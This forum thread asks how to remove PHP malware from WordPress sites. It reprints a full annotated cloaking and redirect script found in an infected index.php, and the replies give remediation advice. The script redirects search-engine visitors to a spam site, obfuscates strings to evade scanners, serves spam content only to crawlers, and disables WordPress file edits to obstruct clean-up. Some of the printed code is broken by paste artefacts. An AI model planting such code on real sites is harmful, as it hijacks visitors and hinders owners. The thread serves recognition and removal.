Malware
leshkapb, 2018-04-17 18:05:42

PHP viruses on WordPress sites. How do I get rid of them?

<?php
// Analyst notes: this listing is a doorway/cloaking script found in a WordPress
// index.php and posted here as a malware sample. The comments describe what each
// part does so a defender can recognise and remove it; the code itself is unchanged.
session_start();
// Hides every warning/notice. Several lines below read variables and array offsets
// that are never assigned in this listing, and this keeps those out of the logs.
error_reporting(0);
// Remote page whose HTML is fetched (getHtml) and served to crawlers further down.
// It has no scheme and is padded with spaces, which matters for the regex that later
// tries to extract "scheme://host/" from it.
$fromsite = " www.dumpscollection.net/dumps/300-115 ";
// Assigned but never read in this listing (the rewrite section references $mysite1).
$mysite = " mysite.uz ";
$filename = "";
// Not referenced anywhere else in this listing.
$qstr = $filename."?vce=";
// Fetches the HTML at $url. Tries file_get_contents() first and falls back to cURL
// when that yields an empty string or false. No TLS verification, HTTP status or
// error handling is configured; on failure the false/empty result is returned as-is.
function getHtml($url)
{
$content=file_get_contents($url);
if(empty($content)){
$ch = curl_init();
$timeout = 5; // connect timeout in seconds, applied via CURLOPT_CONNECTTIMEOUT
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$content = curl_exec($ch);
curl_close($ch);
}
return $content;
}
// Redirect target used by the referer checks below. Note it has no scheme, so the
// "location:" header built from it is not an absolute URL; how a client resolves it
// is not established by this listing.
$jturl = "www.exampasses.com/300-115.html ";//
// Returns true when $crefs (the lower-cased Referer) matches a search-engine name.
// The pattern is built at runtime by removing every "x" from the scrambled literal,
// which yields "bing|aol|ask|google|yahoo|search" — a light obfuscation so a plain
// text search of the file for "google" finds nothing. The match is case-insensitive.
function chref($crefs)
{
$truecref= str_replace("x","","bxxixnxgx|xaxoxxlx|axsxxk|xgxoxxoxgxlxe|yxxaxhxoxo|sxexxaxrxcxh");
if (preg_match("/$truecref/i",$crefs)){
return true;
}else{
return false;
}
}
// The Referer header is client-supplied. The inline /*;*/ comments split the
// "$_SERVER['HTTP_REFERER']" token so naive signature matching does not hit it.
$htprefs = strtolower($_SERVER/*;*/[/*;*/'HTTP_REFERER'/* ;*/]);
// Redirect branch: only visitors arriving from a search engine who do not yet carry
// the 'haircki' cookie. That cookie is set at the end of the file, so each visitor
// is redirected at most once per cookie lifetime.
if(chref($htprefs) && empty($_COOKIE['haircki'])){
// Front page with no query string -> send to the doorway target.
if(!$_SERVER["QUERY_STRING"] && $_SERVER["REQUEST_URI"]=='/') {
header("location: ".$jturl);
exit;
}
// Any other search-referred hit without a ?vce= parameter -> same target.
if(chref($htprefs) && empty($_GET['vce'])){
header(" location: ".$jturl);
exit;
}
// With ?vce=<code>: map the requested exam code to a search page on the spam site.
if(chref($htprefs)&& !empty($_GET['vce']))
{
// Catalogue of certification exam codes. Some entries carry stray spaces and the
// second line contains stray quotes ('642-883' ', 'NSE7' ') that would not parse —
// presumably damage from the forum paste rather than the original file.
$myarr = array( '200-125', '200-310', '810-403', 'CISSP', '300-101', '300-115', '400-101', '300-070' , '300-320', 'ADM-201', '210-060', '300-075', '70-533', 'AWS-SYSOPS', 'SY0-401', '100-105', ' 210-260', 'PRINCE2-PRACTITIONER', '70-534', '70-532', 'CISA', '070-346', 'PMP', '200-105', '1Z0-808', ' EX200', 'CBAP', 'SSCP', '300-135', 'CRISC', 'CISSP-ISSMP', '70-347', 'GCFA', '840-425', '2V0-621D', ' 300-085', '400-051', '300-208', '312-49V8', '74-678', '70-346', 'CGEIT', 'IIA-CIA-PART1', 'PRINCE2- FOUNDATION', 'GISF', 'CCBA', 'JN0-360', 'CSSLP', '70-411', 'PMI-SP', 'PMI-RMP', 'ACMP_6.4', 'PK0-003', ' 210-065', 'E10-002', 'GSEC', '70-417', 'MA0-101', 'CISSP-ISSAP', '70-465', '070-483', 'ICBB', ' 70-463', 'GCIH', 'GSLC', 'N10-006', 'ICGB', '220-902', '70-697', 'M70-201', '1Z0-061', '312- 50', 'E20-385', '070-486', 'C2040-414', '70-461', '1K0-001', '220-901', 'HP0-P25', '1Z0-898' , '2V0-620', '70-487', 'CISM', '70-486', '101', 'PGMP', '200-120', 'IIA-CGAP', 'CWSP-205', ' 1Z0-020', 'CABA','IBQH001', '117-303', 'ACMP', 'CAP', '210-455', '1Z0-883', 'IIA-CCSA', '070-463', 'LSAT', '600-211 ', 'C9550-606', '642-447', 'CAT-241', '1Z0-803', 'C-GRCAC-10', 'C2010-653', 'P2070-072', '1Z0-100 ', '1Z0-807', 'P9530-039', 'CISSP-ISSEP', 'CTAL-TM_SYLL2012', '640-722', 'MB5-705', '1Y0-253', 'CAS-002', '70-466', 'TK0-201', 'A00-260', 'E20-329', 'E20-891', '200-001', 'HP0-Y50', 'CPCM', '210-010 ', '500-006', 'IIA-CIA-PART2', 'IREB', '642-732', '98-364', 'A00-212', 'AND-401', 'DEV-401', 'C2090-614', 'EX0-116', 'HP2-H28', 'ACMA_6.3', '98-361', '1Z0-051', 'C2170-008', 'ITIL', 'MB2-708', '700-037' , '70-410', '1D0-571', 'PRF', '1Z0-897', 'CSSGB', '070-488', '70-483', '1Z0-060', 'LX0-103' , '500-265', 'SPHR', 'ITILF2011', 'C2090-610', 'C2090-612', 'EX0-100', '70-646', '070-347', 'CQE', ' CAT-340', '1Z0-809', '1Y0-301', '070-417', 'CSBA', '1Z0-820', '700-260', '304-150', '70-680' , '1Z0-144', 'A00-240', 'C2020-002', 'C-ISR-60', '642-997', '500-285', 'N10-004', 'E20-532' , 'M70-101', 
'JN0-332','MSC-321', '300-206', '70-496', '010-151', 'HC-711', 'JN0-102', 'ECSS', '101-400', '642-883' ', 'SD0-302', 'C-FSUTIL-60', 'GCIA', 'OG0-091', '642-577', 'CPA', '640-692', '70-696', '500 -210', 'SY0-101', 'CSTE', 'CIOWTSA', 'CEH-001', 'P2090-045', 'CD0-001', 'M70-301', 'CPP', '1Z0-067 ', 'C-FSTBAN-80', '1Z0-068', 'C2140-820', 'GREM', '70-414', 'HP0-Y47', '1D0-520', '102-400', 'LX0-104', '70-462', 'IIA-CFSA', '98-375', 'ISEB-SWT2', 'E20-007', 'C2010-571', '1D0-437', 'NSE7' ', 'HS-330', 'LX0-101', 'EWDA10', 'ADM-211', 'C-TERP10-60', 'CQA', '3310', '1Z0-450', 'MB3-701', '70-640', '70-480' , '300-209');
// Strip an "_..." suffix from the vce parameter, upper-case it, then redirect on the
// first catalogue entry that occurs as a substring (strstr is case-sensitive).
$str=preg_replace('/_(.*)/i','',$_GET['vce']);
$str=strtoupper($str);
$tiaourl=" www.exampasses.com ";
foreach($myarr as $key => $val){
if(strstr($str,$val)){
header("location: ".$tiaourl."search/?search=".$val);
exit;
}
}
}
// $url is never assigned in this listing (it only appears as getHtml's parameter),
// so this branch is dead unless something not shown here populates it.
if(!empty($url)){
header("location: www.exampasses.com ");
exit;
}
}
// Content proxying: fetch the remote site and rewrite its HTML so it reads as a
// local page. $repstr, $mysite1 and $domain are never assigned in this listing;
// with error_reporting(0) they silently evaluate as empty strings.
// Tries to extract "scheme://host/" from $fromsite. As set at the top, $fromsite has
// no scheme, so this does not match and $matches[0] is unset on the lines below.
preg_match("/(http|https):\/\/([\s\S]*?)\//i",$fromsite, $matches);
if(!empty($url))
{
$fromsite=$matches[0];
}
$content = getHtml($fromsite.$url);
$fromsite=$matches[0];
$fromsiteurl =str_replace(array("https://","http://"),"",$fromsite);
// Absolute links to the source host are rewritten to the $repstr prefix; asset paths
// (static, skin, js, media, design, images) are pointed back at the source host.
$content = str_replace("http://".$fromsiteurl,$repstr,$content);
$content = str_replace("https://".$fromsiteurl,$repstr,$content);
$content = str_replace("src=\"".$repstr,"src=\"".$fromsite,$content);
$content = str_replace("href=\"","href=\"".$repstr,$content);
$content = str_replace($repstr.$repstr,$repstr,$content);
$content = str_replace($repstr."static",$fromsite."static",$content);
$content = str_replace($repstr."skin",$fromsite."skin",$content);
$content = str_replace($repstr."js",$fromsite."js",$content);
$content = str_replace($repstr."media",$fromsite."media",$content);
$content = str_replace($repstr."\"",$mysite1."\"",$content);
$content = str_replace($repstr."/\"",$mysite1."\"",$content);
$content = str_replace("/design",$fromsite."design",$content);
// The two regexes below contain stray spaces ("(. *?)", "$ repstr") that look like
// paste artefacts; as printed they would not behave as intended.
$content = preg_replace("#(src|href)=(\"|') http://(www\.)? ".str_replace(".","\.",$fromsite)."/(. *?)(\"|')#", "$1=\"".$repstr."$4\"", $content);
$content = preg_replace("#(src|href)=(\"|')(/|(?!http))(.*?)(\"|')#", "$1=\"".$ repstr."$4\"", $content);
$content = str_replace($repstr.$matches[0],$repstr,$content);
$content = str_ireplace('',''.chr(13).chr(10).'',$content);
$content = str_replace("/js",$fromsite."js",$content);
$content = str_replace("/images",$fromsite."images",$content);
$content = str_replace($repstr.$fromsite,$fromsite,$content);
// Tracker identifiers in the fetched page (statcounter, ga(, google-analytics.com,
// linezing.com, comm100.com, www.51.la) are replaced with junk strings, so the
// served copy does not load the source site's analytics.
$content = str_replace("statcounter","sdf",$content);
$content = str_replace("ga(","sdfsdf",$content);
$content = str_replace("google-analytics.com","sdfsd",$content);
$content = str_replace("linezing.com", "sdfsdf",$content);
$content = str_replace("comm100.com","sdfsdf",$content);
$content = str_replace("www.51.la","sdfsdf",$content);
// Any remaining "=http:..." attribute value is forced to a local-looking path.
$content = preg_replace('/=http:.*[\'"]/','=certification/cisco"',$content);
// The next statement is cut off in the post (open string literal); the original is
// not recoverable from this listing. The line after it replaces every href whose
// host is not $domain with "#", i.e. it strips off-site links.
$content = str_replace($repstr."
$content = preg_replace("#href=(\"|')(http|https)://(?!(www\.)?".str_replace(".","\.",$domain)." )(.*?)(\"|')#i", "href=\"#\"", $content);
// Competitor brand names in the page text are replaced with "Dumpwin".
$content = preg_replace("/certtop|practice-dumps|exam4actual|test4actual|examsell|examgood|testpassport|passcert|killtest|exampdf|dumpstep|ourexam|testhorse|getcertkey|pass4test|dumpkiller|dumpleader|lead2pass|braindump2go|passleader|greatexam |prep4cert|examgoal|ensurepass|dumps4cert|passtutor|dump4exam|prep4certs|testscram|it-pruefungen|cert24|zertifizierung-portal|it-exams|it-practicetests|it-pruefungen|it-braindumps|it-exams|pruefungsfragedeutsch|exam -microsoft|microsoft-pruefungen|exam-ibm|it-practicetests|exam-express|gratisexam|exam24|exam24|passeasily|firsttrycertify|surebraindumps|certleader|certbus|examcoop|newcerts|pass4itsure|flydumps|passitdump|gogoexam|pass-guaranteed |passeasily|it-tests|lead4pass/i", "Dumpwin", $content);
// Cloaking: the proxied, rewritten page is emitted only when the client-supplied
// User-Agent contains one of these crawler substrings; everyone else falls through
// to the normal page. ("$ tmp" on the if line is another paste artefact.)
$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strpos ($tmp, 'google') !== false || strpos ($tmp, 'yahoo') !== false || strpos ($tmp, 'msn') !== false || strpos ($ tmp, 'sqworm') !== false) {
echo $content;
exit;
// WordPress constants: DISALLOW_FILE_EDIT removes the theme/plugin file editor from
// wp-admin and DISALLOW_FILE_MODS additionally blocks plugin/theme installs and
// updates. In an infected index.php this hinders the owner's clean-up; remove both
// along with the rest of this code unless they were set deliberately in wp-config.
}define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);
// Marks the visitor for 100 days (3600*24*100 s) so the redirect branch above,
// which tests empty($_COOKIE['haircki']), skips them on later visits. The cookie
// name is a usable indicator when hunting for this infection in site traffic.
setcookie('haircki','haircooki', time()+3600*24*100);
?>
Here is a virus of this kind, embedded in index.php in the root folder of the site. Help, please.

Maxim Timofeev, 2018-04-17
@webinar

Popular CMS — popular holes))) 100,000 people sit around churning out WP hacks. This is the result.
What to do? There are two steps:
- get rid of the malicious code
- protect yourself from a repeat as much as possible
The first is really only possible from a backup. The second can't be covered in two lines — use the search.

SunHere, 2018-05-03
@SunHere

The virus being embedded in the file is only a consequence; the cause is the presence of holes through which new virus files will keep being uploaded indefinitely.

Maybe Somebody, 2018-04-17
@maybesomebody

Make backups, make backups, make backups, make backups, make backups. OR, by way of ancient shamanism, add a redirect in .htaccess to a normal, virus-free page — for example index2.php! O miracle! The virus is useless. In general, analyze the logs, the site, the folder names and the rest. And log everything you can until the malware removal is finished.

Roman Mirilaczvili, 2018-04-17
@2ord

I already wrote an answer in "How to get rid of the shell on WordPress sites?"

I.CaR Soft, 2018-11-27
@I_CaR

Delete this fucking CMS!
